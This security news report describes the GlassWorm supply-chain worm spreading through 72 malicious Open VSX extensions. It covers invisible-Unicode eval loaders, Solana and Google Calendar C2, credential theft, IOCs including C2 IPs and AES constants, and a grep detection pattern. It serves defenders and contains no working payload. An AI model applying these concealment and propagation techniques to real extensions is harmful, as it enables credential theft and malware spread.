GlassWorm Escalates: 72 Malicious Open VSX Extensions Use

GlassWorm Campaign Escalates with 72 Open VSX Extensions and Blockchain C2

The GlassWorm self-propagating worm campaign — the first confirmed supply-chain worm targeting VS Code extension ecosystems — has significantly escalated. Security researchers at the Socket Research Team disclosed on March 13, 2026 that at least 72 additional malicious Open VSX extensions were published between January 31 and March 13, 2026, introducing a new propagation mechanism that abuses legitimate VS Code manifest fields to silently install the loader via transitive dependencies.

This Wave 4 iteration is the most sophisticated to date, combining invisible Unicode obfuscation, a Solana blockchain dead-drop C2 resolver, and a Google Calendar backup C2 channel with a full post-exploitation toolkit that transforms developer workstations into criminal infrastructure nodes.

What Is Open VSX?

Open VSX Registry is an open-source, vendor-neutral alternative to Microsoft's proprietary Visual Studio Marketplace, operated by the Eclipse Foundation. It serves VS Code-compatible editors that cannot access the Microsoft marketplace — most notably VSCodium, Eclipse Theia, Gitpod, and others. Because these editors rely exclusively on Open VSX, any malicious package published there reaches users without Microsoft's review pipeline.

GlassWorm Timeline

The 72-Extension Wave 4 Campaign

The 72 malicious extensions impersonate widely used developer tools across multiple categories:

• Code linters and formatters — fake ESLint, Prettier
• Language tooling — Python, Vue, Angular, Flutter support
• Code runners and utilities — general productivity tools
• AI coding assistants — impersonations of Claude Code (Anthropic), GitHub Codex, Google Antigravity

Confirmed examples from Socket's IOC list include:

• otoboss.autoimport-extension
• federicanc.dotenv-syntax-highlighting
• twilkbilk.color-highlight-css
• crotoapp.vscode-xml-extension
• oigotm.my-command-palette-extension

New Wave 4 Technique: Transitive Dependency Abuse

The most significant innovation in Wave 4 is the abuse of two legitimate VS Code manifest fields:

• extensionPack — groups of related extensions installed together
• extensionDependencies — extensions that must be installed for functionality

The Attack Flow

1. The attacker publishes an extension that appears entirely benign, with no malicious content
2. After accumulating installs and trust, a later update silently adds a reference to a separate GlassWorm loader extension via extensionPack or extensionDependencies
3. VS Code automatically installs the newly declared dependency on the next update — pulling in the malicious loader without any direct user action

This means defenders cannot evaluate extensions solely on their current code state — the attack is carried in version history and manifest field changes that existing scans may not monitor.

Technical Mechanisms

Invisible Unicode Obfuscation

All meaningful strings in the loader are hidden inside Unicode Private Use Area characters:

• Ranges: 0xFE00–0xFE0F and 0xE0100–0xE01EF
• These codepoints render as zero-width whitespace or are entirely invisible in virtually every code editor, terminal, IDE, and PR diff viewer
• A small inline decoder extracts the hidden bytes and passes them to eval() at runtime
• No malicious code is visible on static inspection of the file

Solana Blockchain Dead-Drop C2

Rather than hardcoding a C2 IP address, the loader queries an attacker-controlled Solana wallet and reads transaction memos for a Base64-encoded string that decodes to the current C2 server address.

• Known C2 IPs: 217.69.3[.]218 and 199.247.10[.]166
• Attacker rotates Solana wallets in Wave 4 to further evade detection
• Because the Solana blockchain is immutable and decentralized, this C2 channel cannot be disrupted by domain seizure or takedowns

Embedded cryptographic indicators:

AES Key: wDO6YyTm6DL0T0zJ0SXhUql5Mo0pdlSz
AES IV:  c4b9a3773e9dced6015a670855fd32b

Google Calendar Backup C2

A secondary C2 channel fetches a Google Calendar event URL embedded in the payload, parses a Base64-encoded string from the event description, and uses the decoded value as a fallback staging server when the Solana-based primary resolver is unavailable.

Russian Locale Gating

Every GlassWorm iteration aborts execution if the target system is configured with a Russian locale — a strong indicator that the threat actor is based in Russia and operating to avoid domestic prosecution.

Full Post-Exploitation Capability Chain

Stage 1: Credential Harvesting

The loader silently exfiltrates all developer credentials on the infected machine:

Stage 2: Self-Propagation

Harvested credentials are immediately weaponized to push additional infected packages and extensions to npm, GitHub, and Open VSX under the victim's identity — creating exponential spread through the ecosystem without new attacker infrastructure.

Stage 3: Cryptocurrency Wallet Targeting

The payload actively hunts for 49 different cryptocurrency wallet browser extensions including MetaMask, Phantom, and Coinbase Wallet, with intent to drain funds.

Stage 4: Zombi Module Deployment

A second-stage payload, Zombi, is fetched from C2 and transforms the developer workstation into a full criminal infrastructure node:

Scale and Impact

• 35,800+ confirmed downloads of infected extensions (Wave 1 alone)
• 22,000+ additional downloads from compromised legitimate developer identity (Wave 3)
• 151 GitHub repositories directly affected between March 3–9, 2026
• Developer workstations inside corporate networks turned into SOCKS proxy nodes for criminal activity
• Any developer who installed, published, or contributed to affected packages may have had credentials exfiltrated

Detection and Mitigation

Immediate Actions

1. Cross-reference all installed extensions against the Socket Research Team's IOC list
2. Rotate all credentials — npm tokens, GitHub tokens (OAuth and PAT), Open VSX publishing tokens, SSH keys — if any affected extension was installed
3. Audit extension manifests for newly added extensionPack or extensionDependencies fields in recent version history — watch for manifest changes that introduce new dependency relationships
4. Check for unauthorized SSH keys and revoke unknown entries
5. Review outbound connections from developer workstations for Solana RPC calls or connections to 217.69.3[.]218 / 199.247.10[.]166

Detection Rules

Knostic has published YARA rules targeting GlassWorm, flagging:

• Solana blockchain C2 lookup patterns
• Credential harvesting patterns for npm/GitHub/OpenVSX/Git/SSH
• The specific AES key/IV constants embedded in the loader

# Screen JavaScript files for invisible Unicode PUA characters:
# Ranges: U+FE00–U+FE0F and U+E0100–U+E01EF
# These have no legitimate use in VS Code extension code
grep -P "[\xef\xb8\x80-\xef\xb8\x8f]" extension.js  # FE00-FE0F

Structural Defenses

• Prefer VS Code with the Microsoft Marketplace over forks using Open VSX — Microsoft applies signature verification that Open VSX currently lacks
• Use extension allowlists in enterprise environments rather than permitting arbitrary extension installs
• Monitor extension version history, not just the current version — the transitive dependency attack is invisible in current-version scans
• Apply the principle of least privilege to developer workstations; restrict outbound internet access to necessary endpoints

Sources

• The Hacker News — GlassWorm Supply-Chain Attack Abuses 72 Open VSX Extensions to Target Developers
• Socket Research Team — 72 Malicious Open VSX Extensions Linked to GlassWorm Campaign
• Koi Security — GlassWorm: First Self-Propagating Worm Using Invisible Code
• BleepingComputer — Self-Spreading GlassWorm Malware Hits OpenVSX, VS Code Registries
• Knostic — Detecting GlassWorm with YARA Rules
• Dark Reading — GlassWorm Returns to Shatter Developer Ecosystems

Related Reading

• Diesel Vortex: Russian Cybercrime Ring Steals 1,649
• Lazarus Group Plants 192 Malicious Packages in npm and PyPI
• Trojanized MCP Server Deploys StealC Infostealer Targeting